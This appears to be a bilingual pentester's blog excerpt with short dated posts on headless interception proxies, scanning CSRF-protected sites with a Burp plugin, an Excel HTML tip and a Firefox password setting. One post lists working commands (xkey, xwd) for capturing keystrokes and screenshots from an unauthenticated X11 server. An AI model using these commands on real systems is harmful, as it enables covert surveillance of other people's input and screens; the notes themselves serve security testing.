      • Zed Attack Proxy avec l'option "-daemon": zap.sh -daemon. Mon expérience dit qu'on doit savoir éditer les fichiers xml de configuration du proxy pour obtenir ce qu'on veut. Pas l'option la plus intéressante.
      • Burp avec l'option -Djava.awt.headless=true. Scripts qui utilisent cette option: sodapop.sh and bscan 
      • Proxystrike avec l'option -c (console) - pas certain si cette option est vraiment utilisable...
      • Metasploit socks4a auxiliary server:
      msf > use auxiliary/server/socks4a
      msf auxiliary(socks4a) > info

      Name: Socks4a Proxy Server
      Module: auxiliary/server/socks4a
      Version: 0
      License: Metasploit Framework License (BSD)
      Rank: Normal

      Provided by:
      sf

      Basic options:
      Name Current Setting Required Description
      ---- --------------- -------- -----------
      SRVHOST 0.0.0.0 yes The address to listen on
      SRVPORT 1080 yes The port to listen on.

      Description:
      This module provides a socks4a proxy server that uses the builtin
      Metasploit routing to relay connections.

      msf auxiliary(socks4a) > run
      [*] Auxiliary module execution completed

      [*] Starting the socks4a proxy server
      msf auxiliary(socks4a) > jobs

      Jobs
      ====

      Id Name
      -- ----
      0 Auxiliary: server/socks4a
       
      --
      Here are the usable options I know to intercept HTTP traffic in headless mode. I've had to use that on an isolated Kali Linux (accessed via SSH without possibility for X/VNC and without Internet download capability):
      There are other options on Kali but they are not as usable or simple to setup:

      12 Nov 2013

      Balayer des sites protégés contre les attaques CSRF

      Pour permettre le balayage de sites protégés contre les attaques de falsification de requêtes inter-site ou "Cross-Site Request Forgery" (CSRF), un plugiciel Burp a été développé (preuve de concept). Celui-ci peut être trouvé ici http://code.google.com/p/pysqlin/downloads/list.

      Tiré d'un article sur http://edge-security.blogspot.ca:
      In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each requests contains a new generated anti-CSRF token needed for the next request, forming a token chain.

      A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at http://code.google.com/p/pysqlin/downloads/list. It should be noted however that this code is a POC and it requires further development in other to be able to work against real environments (any link of a webapp with this behavior is appreciated).

      Original post origin: http://edge-security.blogspot.ca.

      25 Jul 2013

      Conserver les "line-breaks" de HTML vers Excel (sans rangée additionnelle)

      Voici un problème fréquent: on veut importer un tableau HTML vers Excel sans que Excel interprète les tags de retour de chariot <BR> comme un changement de rangée - rendant impossible les fonctions d'ordonnancement et de filtration. Selon moi, le fait de pas avoir de flexibilité à cet égard à partir de l'interface usager de Excel est un bug!

      La solution la plus simple est d'ajouter un style spécifique à Microsoft (dans le fichier HTML) comme suit:

      <html>... <style> br { mso-data-placement:same-cell; } </style> ...</html>

      Merci à Michu (24/7 dev & coffee blog) pour le tuyau!

      Ref: Generating Excel files from web - line breaks in cells 

      Thanks to Michu for the great tip... Initial text copied here for convenience...

      Generating Excel files from web - line breaks in cells

      ...I needed to wrap text in cell, but when I put tag into HTML output, Excel interpreted it as a new row, not a line-break in existing cell. The solution I found is to add into a stylesheet:
          br {mso-data-placement:same-cell;}

      11 Jan 2013

      Attaque de serveur X11 sans authentification (après xhost +)

      Voici quelques commandes pour exploiter un serveur X11 ouvert:

      Capture de clés à distance (remote key capture)
      $ xkey IP:0.0

      NB:
      • Le code source pour xkey.c peut être trouvé ici
      • Utiliser 0.0 pour le port 6000, 1.0 pour le port 6001...
       
      Capture de l'écran (screen capture):
      $ xwd -display IP:0.0 -root -silent -out /tmp/screendump
      $ xv /tmp/screendump 
      $ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


      Références:

      2 Dec 2012

      Analysis of Android app traffic through Burp Suite

      Good summary here

      Related articles

      23 Nov 2012

      Forcing Firefox to remember passwords

      The Firefox configuration setting wallet.crypto.autocompleteoverride  allows the override of the autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (i.e. on Android). I'll need to test this...

      Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

      As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

      Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base